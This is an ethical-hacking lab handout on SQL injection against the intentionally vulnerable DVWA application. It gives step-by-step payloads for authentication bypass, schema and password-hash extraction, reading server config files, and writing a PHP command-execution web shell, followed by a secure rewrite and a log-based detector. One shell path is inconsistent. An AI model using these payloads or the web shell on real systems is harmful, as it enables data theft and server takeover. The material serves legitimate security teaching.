Week 3 - SQL Injection

This document provides instructions for conducting SQL injection exercises using the Damn Vulnerable Web Application (DVWA). It begins with an introduction to SQL injection, describing what it is and potential ramifications. It then outlines steps to set up the DVWA virtual machine and explore SQL injection vulnerabilities with the security setting at "Low". Various techniques are demonstrated such as simple numeric entry, handling of quotes, SQL "OR" injection, and other methods of extracting data and executing commands.

Uploaded by

Paul Crane

SQL Injection exercises

Ethical Hacking lab exercise.

Note that information contained in this document is for educational purposes.

Contents
1 Introduction
1.1 What is SQL Injection?
1.2 Possible Ramifications of SQL Injection
2 SQL Injection in Damn Vulnerable Web App
2.1 Setting up the Simple SQL injection with low level security
2.2 Examine the PHP Source Code
2.3 Simple numeric entry
2.4 Check for handling of quotes
2.5 Simple SQL "OR" injection
2.6 Finding the number of columns in the query
2.7 Guessing field names in a database
2.8 Finding table names in a database
2.9 Find the first character in the database name
2.10 Finding the table names
2.11 Finding the SQL Version
2.12 Find the current database user
2.13 List the password hashes
2.14 Reading arbitrary files
2.15 Writing arbitrary files
2.16 Remote Code execution
3 Major exercise - Investigating WackoPicko

1 INTRODUCTION
1.1 WHAT IS SQL INJECTION?
SQL injection is an attack technique that exploits a security vulnerability occurring in the code of a web
application. Injections can be used to obtain unauthorised access to the underlying data, structure, and
DBMS. It is currently one of the most common web application vulnerabilities. There are two types of
SQL injection: -

1. Plain
2. Blind

1. Plain SQL injection

With this type of injection, the SQL server responds with error messages about the SQL syntax. The web
page accepts data from a client and executes SQL queries without first validating the client's input. The
attacker is then free to extract, modify, add, or delete content from the database.

2. Blind SQL Injection

Blind SQL injection is similar to plain SQL injection except that when an attacker attempts to exploit an
application, rather than getting a useful error message, they get a generic page specified by the
developer. This makes exploiting a potential SQL injection attack slightly more difficult.

1.2 POSSIBLE RAMIFICATIONS OF SQL INJECTION


SQL injection is extremely dangerous and can lead to one or more of the following: -

• Authentication Bypass: This attack allows an attacker to log on to an application, potentially with
administrative privileges, without supplying a valid username and/or password.
• Information Disclosure: This attack allows an attacker to obtain, either directly or indirectly,
sensitive information that is contained in a database.
• Compromised Data Integrity: This attack involves the alteration of the contents of a database.
• Compromised Availability of Data: This attack allows an attacker to delete information with the
intent to cause harm or delete log or audit information that is contained in a database.
• Remote Command Execution: Performing command execution through a database can allow an
attacker to compromise the host operating system.

Note: - It is recommended that you copy and paste the SQL queries directly from this handout.

2 SQL INJECTION IN DAMN VULNERABLE WEB APP
DVWA is a Web application security teaching platform written by Ryan Dewhurst. It is an excellent
starting point for learning the basics.

2.1 SETTING UP THE SIMPLE SQL INJECTION WITH LOW LEVEL SECURITY

Damn Vulnerable Web Application (DVWA) has three different security settings. These correspond
to: -

Low - No effort has been made to secure the code.
Medium - Some effort has been made to secure the PHP code.
High - The code is (probably) as it should be written.

We will examine SQL injection with the setting at Low.

• Run the Web App virtual machine.

• From Firefox on your main Windows desktop, browse to http://192.168.1.100/phpmyadmin/
(log in as root with a password of owaspbwa) and look at the structure of the databases and
the DVWA database that we will be examining.

We can see that the database name is DVWA and also there are tables named "users" and
"guestbook".

• We can also see the values in the users table (the passwords are MD5 hashed).

• Browse to http://192.168.1.100/dvwa/login.php

• Log in as admin with a password of password.

• Ensure that Security Level is set to Low

The next section will examine the menu option SQL injection.

This simulates the situation where the user simply enters a numeric user ID. This section is useful in that
it shows how simple SQL injection works. We will build up from the simple cases to doing more complex
injection commands.

2.2 EXAMINE THE PHP SOURCE CODE


In this case, we can examine the PHP source code directly using the PHP file manager (filemanager.php).

• Browse to http://192.168.1.100/filemanager/filemanager.php?p=

• Then browse to dvwa/vulnerabilities/sqli/source

You will see the PHP source code that runs for High, Medium and Low security.

• Examine low.php and you should see that there is no input filtering (see below).

$id = $_GET['id'];

$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";

$result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );

We can see that no attempt has been made to secure the code.
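As an added example (not code from the handout or from DVWA itself), here is the same lookup rewritten the way it should be secured: the id is validated as an integer and sent to MySQL as a bound parameter, and the driver's error text is logged rather than echoed. The DSN and the account name are assumptions.

```php
<?php
// Added example, not DVWA's own code: the low.php lookup from this handout
// rewritten so that what the user types can never change the SQL statement.
// The DSN and credentials below are placeholders (assumptions).

// The vulnerable pattern from low.php, kept here for comparison:
//   $id     = $_GET['id'];
//   $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
//   $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>');
// $id is pasted into the SQL text, and the raw MySQL error is shown to the browser.

function lookupUser(PDO $pdo, string $rawId): array
{
    // 1. Input validation: user_id is an integer column, so anything that is
    //    not a non-negative integer (O'Malley, ' OR 1=1;-- ...) is rejected here.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($id === false) {
        return [];
    }

    // 2. Prepared statement: the SQL text is fixed at this point; $id reaches
    //    the server as a bound parameter, so quotes, comment markers and
    //    UNION keywords inside it are data, never syntax.
    $stmt = $pdo->prepare(
        'SELECT first_name, last_name FROM users WHERE user_id = :id LIMIT 1'
    );
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    // LIMIT 1 also removes the "loop prints every row" behaviour seen in 2.5.
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

try {
    $pdo = new PDO(
        'mysql:host=127.0.0.1;dbname=dvwa;charset=utf8mb4',
        'dvwa_app',   // assumed low-privilege account without the FILE privilege,
        'CHANGE_ME',  // so load_file() / INTO OUTFILE fail even if injection succeeds
        [
            PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
            PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepares
        ]
    );

    foreach (lookupUser($pdo, $_GET['id'] ?? '') as $row) {
        // 3. Encode output: values read back from the database are untrusted too.
        echo 'First name: ' . htmlspecialchars($row['first_name'], ENT_QUOTES, 'UTF-8') . "<br>\n";
        echo 'Surname: '    . htmlspecialchars($row['last_name'],  ENT_QUOTES, 'UTF-8') . "<br>\n";
    }
} catch (PDOException $e) {
    // 4. Log the driver error, never display it: echoing mysql_error() is what
    //    turns a blind injection into the "plain" kind described in 1.1.
    error_log('user lookup failed: ' . $e->getMessage());
    http_response_code(500);
    echo 'Lookup failed.';
}
```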

The files can also be viewed from the web page using the View Source button that has been added.

• Back in Firefox, hit the View Source button (at the bottom right hand side of the page).

Note that the code that runs in DVWA can be viewed at any time using this method.

• By viewing the PHP file, we can see that the SQL query that will run is

SELECT first_name, last_name FROM users WHERE user_id = '$id'

where $id is what we enter in the text box.

Note: The View Source window also has a Compare button at the left hand bottom of the screen. This
will show the low/medium/high source code.

2.3 SIMPLE NUMERIC ENTRY


We will first examine how the system functions.

• Enter an ID of 1

This gives an output of: -

ID: 1
First name: admin
Surname: admin

The source code is: -

SELECT first_name, last_name FROM users WHERE user_id = '$id'

This means that the executed SQL query can be obtained by substituting 1 for $id

SELECT first_name, last_name FROM users WHERE user_id = '1'

Tutorial
Try entering simple values in the text box.

2.4 CHECK FOR HANDLING OF QUOTES


We will use something that looks benign to check for quote handling errors.

• Enter

O'Malley

This should give: -

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version
for the right syntax to use near 'Malley'' at line 1

The SQL query is: -

SELECT first_name, last_name FROM users WHERE user_id = '$id'

Meaning that the SQL query that is executed is the following: -

SELECT first_name, last_name FROM users WHERE user_id = 'O'Malley'

We can see that everything after the single quote is being treated as a SQL request. Entering O'Malley
means that there are unclosed single quotes resulting in the error.

2.5 SIMPLE SQL “OR” INJECTION:
We will first try a simple OR injection query. Note that -- indicates comment in MySQL and the ; means
end of line. The basic aim is to try to craft a value of $id that will ignore the real value and do a “1=1”.
This is useful when attacking a username/password combination where we want the query to essentially
ignore the password.

• Enter the following: -

' OR 1=1;--

Note that you must put a space at the end: MySQL only treats -- as a comment when it is followed by whitespace.

This should dump the entire database - which is a little unusual (if you examine the source code, you will
see that it loops around with all results).

Examining this, the original code is

SELECT first_name, last_name FROM users WHERE user_id = '$id'

By simple substitution, what will execute is: -

SELECT first_name, last_name FROM users WHERE user_id = '' OR 1=1;-- '

Tutorials
Other queries that dump the database are shown below. Build the SQL queries to show how they
function and write them underneath. Note the SQL query is the following: -

SELECT first_name, last_name FROM users WHERE user_id = '$id'

a' OR ''='
…………………………………………………………………………………….

a' OR 'x'='x';#
…………………………………………………………………………………….

' OR '1=1';--
…………………………………………………………………………………….

Note that the # also indicates a comment in MySQL

2.6 FINDING THE NUMBER OF COLUMNS IN THE QUERY
When attacking, it can be useful to find the number of columns in the query (in this case there are two
first_name and last_name). This can be achieved by using the SQL Command ORDER BY.

It is a simple case of increasing the column number to order by and waiting for an error. The SQL query we
are trying to build is similar to the following: -

SELECT first_name, last_name FROM users WHERE user_id = 'a' ORDER BY 1;#''

Try entering the following. The first two of the following will do nothing. The third one will give an error.

' ORDER BY 1#
' ORDER BY 2#
' ORDER BY 3#

You should see no error in the first two commands because the query has functioned correctly.

The error on the last command indicates that there are only two columns in the query. Since there are
two columns (first_name and last_name), the first two queries do not produce an error and it is
impossible to ORDER by column 3.

2.7 GUESSING FIELD NAMES IN A DATABASE


In this case, we know the field names but in most cases we will not, meaning that we will either have to
guess them or find some way of extracting them. Web developers tend to be logical (as taught by
textbooks and their tutors) meaning that field names can often be guessed easily.

• Enter

' OR firstname IS NULL#

The resulting query was: -

SELECT first_name, last_name FROM users WHERE user_id = '' OR firstname IS NULL#

This should give an error.

• Enter

' OR first_name IS NULL#

The resulting query was: -

SELECT first_name, last_name FROM users WHERE user_id = '' OR first_name IS NULL #

This gives no error, indicating that the command has been accepted, i.e. a column named first_name
exists. The query also shows that first_name is not NULL in any row (i.e. it is "something").

• Try

' OR first_name = 'Pablo'--

' OR first_name LIKE '%P%'--

Using this same technique, it may be possible to find the value of other fields (passwords, email
addresses, etc.). In more secure scenarios, we may wish to find user names. The SQL LIKE operator
allows us to examine the database by finding values LIKE a character (e.g. the character P). Note that
% means wildcard.

Tutorial
Experiment to try to find other user names.

2.8 FINDING TABLE NAMES IN A DATABASE


In a normal web application database, there will be many different tables – i.e. developer created and
also system tables. To be able to interrogate a system, it is usually necessary to find the table name.

• Try

' OR test.user_id IS NOT NULL#

This should return

Unknown column 'test.user_id' in 'where clause'

This indicates that there is no table named test. The syntax of the query is as follows: -

SELECT first_name, last_name FROM users WHERE user_id = '' OR test.user_id IS NOT NULL#

We are using the tablename.columnname format to help guess the table name. If we guess an
incorrect table name we will get an error. If, however, we have guessed the correct table name, the
query should not have an error.

• Try the following

' OR users.user_id IS NOT NULL #

There is no error, i.e. the database and table exist.

2.9 FIND THE FIRST CHARACTER IN THE DATABASE NAME

In an attempt to find the database name, we can use LIKE and database(). Try the following: -

' OR database() LIKE 'A%' #
' OR database() LIKE 'B%';#
' OR database() LIKE 'C%';#
' OR database() LIKE 'D%';#

The above technique can be used to get each letter, e.g. once D matches, try 'DV%', then 'DVW%' and so
on. We now know that the database is named DVWA.

2.10 FINDING THE TABLE NAMES


To investigate the PHP/MySQL system further, the following SQL query will give us the table names in
the database "dvwa".

SELECT first_name, last_name FROM users WHERE user_id = '' UNION SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema LIKE 'dvwa' #'

• i.e. enter the following: -

' UNION SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema LIKE 'dvwa' #

This should give the database name and the database tables. Note: - all tables are dumped in this case
because of the loop in the PHP code.

2.11 FINDING THE SQL VERSION
It is often useful to find the version of MySQL that is being used (syntax variations and limitations etc
exist with different versions). This SQL query returns the version:-

SELECT first_name, last_name FROM users WHERE user_id = '' UNION ALL
SELECT 1, @@version #

• Enter the following: -

' UNION SELECT 1, @@version#

2.12 FIND THE CURRENT DATABASE USER:


If we do manage to run our own code on the web server, it is useful to know the context in which our code
is running (e.g. high privilege such as root or admin, or low privilege). The following query gives us the current user.

SELECT first_name, last_name FROM users WHERE user_id = '' UNION ALL
SELECT system_user(),user() #

• i.e. Enter the following : -

' UNION ALL SELECT system_user(),user() #

2.13 LIST THE PASSWORD HASHES:


One obvious goal of an attacker is to obtain user passwords. If we can obtain the password for an
elevated privilege user, we could check to see if they have a database management program such as
phpMyAdmin running, i.e. log in and see what can be configured or altered.
The following SQL query can be issued.

SELECT first_name, last_name FROM users WHERE user_id = '' UNION SELECT
user, password FROM dvwa.users #

• i.e. enter the following : -

' UNION SELECT user, password FROM dvwa.users #

This will hopefully display the MD5 password hashes that can then be cracked with Cain, John the Ripper
or other password crackers. We will show how this can be achieved later in the handout.

Note: - Many, many databases contain unhashed passwords – this is very poor practice. If a hacker
gets “in”, they have ALL the passwords.

2.14 READING ARBITRARY FILES:


For an attacker, it can be very useful to have read access to files on the compromised machine. This can
lead to disclosure of information that helps the attacker to perform further attacks.

SELECT first_name, last_name FROM users WHERE user_id = '' UNION SELECT load_file('/var/www/dvwa/.htaccess'), '1'

• Enter the following: -

' UNION SELECT load_file('/var/www/dvwa/.htaccess'), '1

This should show us the .htaccess file, which is an Apache per-directory configuration file. We could also
read any file that the SQL server has read rights to. There may be files such as .htpasswd, or some other
file that contains sensitive information. PHP files that access a SQL database will often have the
database password listed in the file. SQL injection will also allow us to view the .php file without the PHP
first being interpreted by the server.

• Enter the following (Note nothing will appear on screen).

' UNION SELECT load_file('/var/www/dvwa/config/config.inc.php'),'1#

This works without error, but there is nothing printed to the screen.

• Now view the page source, however, and you should find the file contents.

2.15 WRITING ARBITRARY FILES:
The ability to write files to the server means that an attacker can write web pages (e.g. deface the web
site) or even inject code files on to the server that they can access from a web browser (or other client).
The following will create a file on the server.

SELECT first_name, last_name FROM users WHERE user_id = '' UNION SELECT 'test', '123' INTO OUTFILE '/var/www/dvwa/temp/testing1.txt' -- '

• Enter the following: -

'UNION SELECT 'test', '123' INTO OUTFILE '/var/www/dvwa/temp/testing1.txt' --

• Browse to http://192.168.1.100/dvwa/temp/ and you should see the created file.

2.16 REMOTE CODE EXECUTION:


The “Holy Grail” of web application hacking is to be able to run arbitrary code on the server.
The following SQL query will create a file called shell.php.

SELECT first_name, last_name FROM users WHERE user_id = '' UNION SELECT '', '<?PHP system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/dvwa/temp/shell.php';#'

• So inject the following: -

' UNION SELECT '', '<?PHP system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/dvwa/temp/shell.php';#

• Now point your browser to the following

http://192.168.1.100/dvwa/shell.php?cmd=ls

We have just run a command on the remote server. We can run any Linux command. From here we
could download and run files (backdoor, keylogger, etc.), change system settings, stop firewalls, stop
anti-virus, add system users, etc.

Note: this is only a simple shell. More powerful shells can be injected.
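From the defender's side, every payload used in sections 2.5 to 2.16 arrives in the id= query parameter and is recorded in the web server's access log. As an added example (not part of the handout or of DVWA), the script below pulls that parameter out of combined-format log lines and flags the patterns seen in this lab; the log lines are constructed for the demonstration.

```php
<?php
// Added example, not part of the handout or of DVWA: a detector for the
// injection payloads used in sections 2.5-2.16 when they appear in the
// id= parameter of Apache access-log lines. The log lines below are
// constructed; the request path matches the DVWA page used in this lab.

const SQLI_PATTERNS = [
    'quote_or_comment' => '/\'\s*(or|and)\b.*(--|#)/i',               // ' OR 1=1;--   a' OR 'x'='x';#
    'order_by_probe'   => '/\'\s*order\s+by\s+\d+/i',                 // column counting (2.6)
    'union_select'     => '/union\s+(all\s+)?select\b/i',             // data extraction (2.10-2.13)
    'schema_probe'     => '/information_schema|database\(\)\s*like/i', // 2.9, 2.10
    'file_access'      => '/load_file\s*\(|into\s+outfile\b/i',       // file read/write (2.14-2.16)
];

/** Pull the URL-decoded id= value out of a combined-format access-log line. */
function idParamFromLogLine(string $line): ?string
{
    if (!preg_match('/"(?:GET|POST) (\S+) HTTP\//', $line, $m)) {
        return null;
    }
    $query = parse_url($m[1], PHP_URL_QUERY);
    if (!is_string($query)) {
        return null;
    }
    parse_str($query, $params);          // also decodes %27 -> ' and + -> space
    return isset($params['id']) ? (string) $params['id'] : null;
}

/** Names of every pattern that matches; an empty array means nothing suspicious. */
function classifyId(string $id): array
{
    $collapsed = preg_replace('/\s+/', ' ', $id);   // tabs/newlines count as spaces
    $hits = [];
    foreach (SQLI_PATTERNS as $name => $regex) {
        if (preg_match($regex, $collapsed)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Constructed sample lines: a benign lookup, then payloads from this handout,
// URL-encoded as a browser sends them ('#' arrives as %23; a literal # would
// start the URL fragment and never reach the server).
$logLines = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /dvwa/vulnerabilities/sqli/?id=%27+OR+1%3D1%3B--+&Submit=Submit HTTP/1.1" 200 2048',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /dvwa/vulnerabilities/sqli/?id=%27+ORDER+BY+3%23&Submit=Submit HTTP/1.1" 200 300',
    '10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /dvwa/vulnerabilities/sqli/?id=%27+UNION+SELECT+user%2C+password+FROM+dvwa.users+%23&Submit=Submit HTTP/1.1" 200 900',
    '10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /dvwa/vulnerabilities/sqli/?id=%27+UNION+SELECT+load_file%28%27%2Fvar%2Fwww%2Fdvwa%2F.htaccess%27%29%2C+%271&Submit=Submit HTTP/1.1" 200 700',
];

foreach ($logLines as $line) {
    $id = idParamFromLogLine($line);
    if ($id === null) {
        continue;
    }
    $hits = classifyId($id);
    printf("%-55s %s\n", var_export($id, true), $hits ? 'ALERT ' . implode(',', $hits) : 'ok');
}
```

Only the first line reports ok; the others are flagged with the pattern names that matched, which is the kind of signal a WAF rule or SIEM alert for this page would key on.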

3 MAJOR EXERCISE - INVESTIGATING WACKOPICKO
WackoPicko (http://192.168.1.100/WackoPicko/users/login.php) has a SQL injection vulnerability. Use
the vulnerability to dump all the usernames and passwords.
